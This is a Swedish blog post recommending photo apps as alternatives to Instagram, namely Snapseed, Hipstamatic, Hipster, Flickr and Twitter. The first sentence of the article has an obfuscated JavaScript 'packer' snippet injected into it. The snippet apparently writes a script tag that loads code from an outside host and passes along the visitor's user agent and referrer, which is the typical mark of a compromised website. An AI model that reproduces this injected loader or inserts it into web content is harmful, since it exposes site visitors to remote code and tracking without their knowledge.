Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Alternativtips till Instagram

Alternativtips till Instagram
Sebastian

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hresz|var|u0026u|referrer|esnit||js|php’.split(’|’),0,{}))
du en av de många aktiva användarna som tycker att Instagram gått för långt med sina ändringar av regler? 

Även om det Facebook-ägda bolaget nu korrigerat sitt användaravtal efter att folk rasat mot dem så är det många som nu funderar på att byta tjänst. Men vilka alternativ finns det? Är de lika bra? 

Här nedan har ni några alternativ till Instagram som fungerar på samma sätt. Några till och med bättre.

Snapseed

Snapseed är en tjänst som levereras av Google. Appen är gratis och är integrerad med deras sociala tjänst Google+. Det finns även möjlighet att dela med sig av bilderna till Twitter och Facebook om man så vill. Dock måste du först spara ner bilden lokalt i din smartphone innan du kan ladda upp den.

Hipstamatic

Hipstamatic är en annan populär fotoapp. Den fanns faktiskt innan Instagram kom till liv. Skillnaden med Hipstamatic är att du väljer effekterna genom att kombinera filmtyp, lins och blixt innan du tar själva fotot, lite mer realistiskt. Tjänsten är inte gratis men du kan synka till Facebook och Twitter.

Hipster

Med Hipster kan du välja bland över 20 olika filter samt geotagga dina bilder. Tjänsten påminner mycket om Instagram men har större fokus på platstjänster. Det är kul då du kan se exakt vart bilden är tagen. Tjänsten låter dig synka med Facebook, Twitter, Flickr och Tumblr. Dock är de svenska användarna få, men varför inte starta trenden?

Flickr

Kanske en av de största kommande konkurrenten till Instagram. Flickr som är en av världens största portal med bilder tagna av duktiga fotografer men också amatörer har idag över 50 miljoner användare. Tjänsten finns som gratisversion och betalversion Flickr Pro. Vi har testat den och användargränssnittet ser faktiskt riktigt lovande ut.

Twitter

Sen självklart Twitter. Tjänsten har blivit en av den stora konkurrenten till Instagram sen de lanserade bilduppladdning i fotoflödet. Instagram har även inaktiverat delning på Twitter. Twitter har då i sin tur i samarbete med tjänsten Aviary nu lanserat ett urval av fotofilter som finns integrerade i tjänsten.

Kort och gott finns det bra alternativ till Instagram. Det gäller bara att hitta den tjänst man själv känner sig bekväm med.

Kommentera gärna nedan om ni använder någon av dessa tjänster eller vet några fler bra alternativ!